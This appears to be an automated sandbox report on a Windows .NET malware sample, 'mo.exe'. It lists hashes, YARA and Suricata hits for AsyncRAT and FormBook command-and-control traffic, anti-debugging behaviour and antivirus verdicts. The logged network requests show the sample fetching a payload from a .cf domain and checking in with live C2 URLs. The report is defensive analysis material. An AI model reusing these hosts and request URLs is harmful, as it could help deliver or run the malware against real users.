popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

mo.exe

AntiVM PE32 AntiDebug PE File .NET EXE
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 May 20, 2022, 1:13 p.m. May 20, 2022, 1:15 p.m.
Size 45.0KB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 e1ca14960f10e03626452fffbe57a87f
SHA256 5d0afd545a7691aa9db609487e20297ce8b7e9c5428599fb323f53ad28fba089
CRC32 61632CF7
ssdeep 384:Mue0eCevzIBQpB+P6Vka2U9oXgfndiHBDuLVaI791xkEpYT2MwU6k2lrP6fPRzfX:NkOdUWXgssVDd6g6z1cMn6iR
Yara
  • IsPE32 - (no description)
  • Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT
  • Is_DotNET_EXE - (no description)
  • PE_Header_Zero - PE File Signature

Name Response Post-Analysis Lookup
uacdrc.cf
A 192.185.174.177
192.185.174.177
www.coastalprecisionpainting.com
A 216.239.32.21
A 216.239.38.21
A 216.239.36.21
A 216.239.34.21
216.239.32.21
www.sverigeochvarlden.com
A 54.38.220.85
54.38.220.85
IP Address Status Action
164.124.101.2 Active Moloch
192.185.174.177 Active Moloch
216.239.32.21 Active Moloch
54.38.220.85 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.101:55871 -> 164.124.101.2:53 2025107 ET INFO DNS Query for Suspicious .cf Domain Potentially Bad Traffic
TCP 192.168.56.101:49162 -> 192.185.174.177:80 2031092 ET HUNTING Request to .CF Domain with Minimal Headers Potentially Bad Traffic
TCP 192.168.56.101:49170 -> 54.38.220.85:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 54.38.220.85:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 54.38.220.85:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 216.239.32.21:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 216.239.32.21:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 216.239.32.21:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Waiting for 2
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: seconds, press a key to continue ...
console_handle: 0x00000007
1 1 0
suspicious_features GET method with no useragent header suspicious_request GET http://uacdrc.cf/m/Hjacjj_Saknuvuf.png
suspicious_features GET method with no useragent header suspicious_request GET http://www.sverigeochvarlden.com/rx29/?X48xI8ZX=9OJdw6AqaLFu2CpTEaL60IC+kV8XOuE0/iJQW1PtG6+ocC4VtnQuwuhzCtKdssjBA9XKIvBj&Ez=ltCpO81
suspicious_features GET method with no useragent header suspicious_request GET http://www.coastalprecisionpainting.com/rx29/?X48xI8ZX=zHCO7pkqkEsXRaEtaq3NMLg2kEfwcfvgNPJNt7zNRAQ1QSuaywxNqZAS3bVTeKiTQ+PvBfZw&Ez=ltCpO81
request GET http://uacdrc.cf/m/Hjacjj_Saknuvuf.png
request GET http://www.sverigeochvarlden.com/rx29/?X48xI8ZX=9OJdw6AqaLFu2CpTEaL60IC+kV8XOuE0/iJQW1PtG6+ocC4VtnQuwuhzCtKdssjBA9XKIvBj&Ez=ltCpO81
request GET http://www.coastalprecisionpainting.com/rx29/?X48xI8ZX=zHCO7pkqkEsXRaEtaq3NMLg2kEfwcfvgNPJNt7zNRAQ1QSuaywxNqZAS3bVTeKiTQ+PvBfZw&Ez=ltCpO81
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 1112
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Bkav W32.AIDetectNet.01
Lionic Trojan.Multi.Generic.4!c
tehtris Generic.Malware
MicroWorld-eScan Trojan.GenericKD.50306070
FireEye Generic.mg.e1ca14960f10e036
McAfee RDN/Generic Downloader.x
Cylance Unsafe
Sangfor Suspicious.Win32.Save.a
Alibaba Trojan:MSIL/DropperX.35e5fc16
Arcabit Trojan.Generic.D2FF9C16
BitDefenderTheta Gen:NN.ZemsilF.34682.cm0@aWkkFDl
Cyren W32/ABRisk.GJSP-9130
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/TrojanDownloader.Agent.JDM
TrendMicro-HouseCall TROJ_GEN.R002H0CEI22
Paloalto generic.ml
Kaspersky HEUR:Trojan-Spy.MSIL.Noon.gen
BitDefender Trojan.GenericKD.50306070
Avast Win32:DropperX-gen [Drp]
Tencent Msil.Trojan-downloader.Agent.Akfa
Ad-Aware Trojan.GenericKD.50306070
Emsisoft Trojan.GenericKD.50306070 (B)
F-Secure Heuristic.HEUR/AGEN.1249297
McAfee-GW-Edition Artemis!Trojan
SentinelOne Static AI - Malicious PE
Sophos Mal/Generic-S
APEX Malicious
Avira HEUR/AGEN.1249297
Gridinsoft Ransom.Win32.Wacatac.sa
Microsoft Trojan:Win32/Wacatac.B!ml
ZoneAlarm HEUR:Trojan-Spy.MSIL.Noon.gen
GData Trojan.GenericKD.50306070
Cynet Malicious (score: 100)
MAX malware (ai score=83)
Malwarebytes Trojan.MCrypt.MSIL.Generic
Ikarus Trojan-Spy.Vidar
MaxSecure Trojan.Malware.300983.susgen
Fortinet MSIL/Agent.LVE!tr.dldr
AVG Win32:DropperX-gen [Drp]
CrowdStrike win/malicious_confidence_90% (W)